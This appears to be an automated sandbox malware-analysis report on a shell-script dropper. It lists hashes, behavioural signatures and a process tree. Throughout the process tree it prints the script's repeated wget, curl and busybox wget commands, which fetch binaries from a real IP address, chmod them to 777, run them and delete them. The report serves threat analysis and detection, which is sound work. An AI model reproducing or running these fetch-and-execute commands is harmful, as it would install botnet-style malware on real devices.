Analysis
-
max time kernel
38s -
max time network
45s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:48
Static task
static1
Behavioral task
behavioral1
Sample
d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh
-
Size
10KB
-
MD5
129ca570f400a031e8b2fff558e38eae
-
SHA1
d1a5686ea5940430161a4b56215e96e6a30d09b4
-
SHA256
d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df
-
SHA512
9ffbdb2ee7c1d682b47152222da7b962fb4babe280a71504038fe31ccbe5f7888945b0200d2979ea5f05b7b014160a0ad83d0a01debc76197266750fb26225b4
-
SSDEEP
192:9XLtkt0tx2SQ2I1t1hg1d6+r6yrYD1tCtkt0tx2S9Jt1N6+r6yt:9XB0kx2SQ2I1t1hg17e1ty0kx2S9j1t
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 854 chmod 919 chmod 752 chmod 792 chmod 842 chmod 866 chmod 830 chmod 848 chmod 872 chmod 679 chmod 687 chmod 895 chmod 901 chmod 889 chmod 822 chmod 883 chmod 810 chmod 925 chmod 907 chmod 913 chmod 731 chmod 860 chmod 709 chmod 798 chmod 836 chmod 816 chmod 772 chmod 804 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 680 TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA 688 zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv 710 eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk 732 NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr 753 UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY 773 efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX 793 jbkBazKADCANOq2el15iaIH9fETZUnZ8iX /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s 799 LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s /tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY 805 vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY /tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA 811 2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA /tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz 817 oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz /tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe 823 BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe /tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s 831 jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s /tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93 837 OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93 /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr 843 UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 849 TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA 855 zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv 861 eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk 867 NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX 873 jbkBazKADCANOq2el15iaIH9fETZUnZ8iX /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY 884 efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY /tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe 890 BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe /tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s 896 jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s 902 LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s /tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY 908 vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY /tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA 914 2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA /tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz 920 oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz /tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93 926 OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93 -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA curl File opened for modification /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv curl File opened for modification /tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz curl File opened for modification /tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93 curl File opened for modification /tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY curl File opened for modification /tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz curl File opened for modification /tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe curl File opened for modification /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY curl File opened for modification /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr curl File opened for modification /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv curl File opened for modification /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s curl File opened for modification /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s curl File opened for modification /tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe curl File opened for modification /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 curl File opened for modification /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA curl File opened for modification /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk curl File opened for modification /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 curl File opened for modification /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX curl File opened for modification /tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA curl File opened for modification /tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93 curl File opened for modification /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX curl File opened for modification /tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s curl File opened for modification /tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY curl File opened for modification /tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA curl File opened for modification /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk curl File opened for modification /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY curl File opened for modification /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr curl File opened for modification /tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s curl
Processes
-
/tmp/d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh/tmp/d9bdc45be8f672c6600b1fb26339db85ee21d8baad58f8a2fbb421bf697cd1df.sh1⤵PID:648
-
/bin/rm/bin/rm bins.sh2⤵PID:650
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵PID:653
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:669
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵PID:676
-
-
/bin/chmodchmod 777 TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵
- File and Directory Permissions Modification
PID:679
-
-
/tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4./TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵
- Executes dropped EXE
PID:680
-
-
/bin/rmrm TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵PID:681
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵PID:682
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:683
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵PID:684
-
-
/bin/chmodchmod 777 zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA./zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵
- Executes dropped EXE
PID:688
-
-
/bin/rmrm zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵PID:689
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵PID:691
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:696
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵PID:704
-
-
/bin/chmodchmod 777 eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵
- File and Directory Permissions Modification
PID:709
-
-
/tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv./eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵
- Executes dropped EXE
PID:710
-
-
/bin/rmrm eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵PID:713
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵PID:725
-
-
/bin/chmodchmod 777 NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk./NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵PID:749
-
-
/bin/chmodchmod 777 UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr./UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵PID:755
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵PID:767
-
-
/bin/chmodchmod 777 efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY./efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵PID:774
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:782
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵PID:788
-
-
/bin/chmodchmod 777 jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX./jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵PID:794
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵PID:795
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵PID:797
-
-
/bin/chmodchmod 777 LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s./LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵PID:800
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵PID:801
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵PID:803
-
-
/bin/chmodchmod 777 vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY./vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵PID:807
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵PID:809
-
-
/bin/chmodchmod 777 2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA./2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵PID:815
-
-
/bin/chmodchmod 777 oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz./oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵PID:821
-
-
/bin/chmodchmod 777 BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe./BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵PID:825
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵PID:827
-
-
/bin/chmodchmod 777 jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s./jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵PID:832
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵PID:833
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵PID:835
-
-
/bin/chmodchmod 777 OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93./OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵PID:841
-
-
/bin/chmodchmod 777 UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr./UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵PID:847
-
-
/bin/chmodchmod 777 TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4./TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵PID:850
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵PID:851
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵PID:853
-
-
/bin/chmodchmod 777 zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA./zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵PID:859
-
-
/bin/chmodchmod 777 eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv./eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵PID:865
-
-
